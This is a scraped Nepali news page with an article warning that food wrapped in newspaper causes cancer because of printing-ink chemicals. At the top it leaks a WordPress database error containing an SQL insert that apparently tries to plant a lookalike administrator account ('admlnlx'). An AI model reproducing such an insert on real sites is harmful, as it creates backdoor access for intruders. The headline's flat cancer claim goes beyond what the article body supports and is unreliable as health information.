WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUeAFmLxgzO8vm69l6dfPwiGOEMlEn1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:23:32', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सावधान ! पत्रिकामा पोको पारिएको खानेकुराले क्यान्सर हुन्छ – Gaule Khabar

सावधान ! पत्रिकामा पोको पारिएको खानेकुराले क्यान्सर हुन्छ

सावधान ! पत्रिकामा पोको पारिएको खानेकुराले क्यान्सर हुन्छ
एजेन्सी,माघ १-
तपाई पत्रिकामा पोको पारेर ल्याइएको खाने कुरा खानुहुन्छ भने सावधान हुनुहोस्र । यसरी पत्रिकामा पोको पारेर ल्याइने खानेकुराले स्वास्थ्यमा गम्भीर असर गर्ने तथ्य सार्वजनिक भएको छ ।

चनाचटपटेदेखि समोसा लगायतका ठोस खानेकुरा आजभोली पत्रिकामा प्याक गरेर लैजाने र खाने प्रचलन रहेको छ । जसले स्वास्थ्यमा भने गम्भीर हानी गरिरहेका हुन्छ ।

भारतको खाद्यसुरक्षा तथा मापदण्ड प्रधिकरणले गरेको एक अध्ययन अनुसार त्यसरी पत्रिकामा पोको पारेर प्रयोग हुने खानेकुरा नखान सबैमा आग्रह गरिएको छ । पत्रिकामा प्रयोग गरिने मसिमा स्वास्थ्यमा प्रत्यक्ष हानी गर्ने तत्वहरुकाो प्रयोग हुने गरेको उसले जनाएको छ ।
पत्रिकाको मसिलाई सुकाउनका लागि केही रसायनको प्रयोग गरिएको हुन्छ जुन स्वास्थ्का लागि अत्यन्त्य हानीकारक मानिन्छ । ती रसायनले मानिसको प्रजननमा समेत असर पर्ने गर्दछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका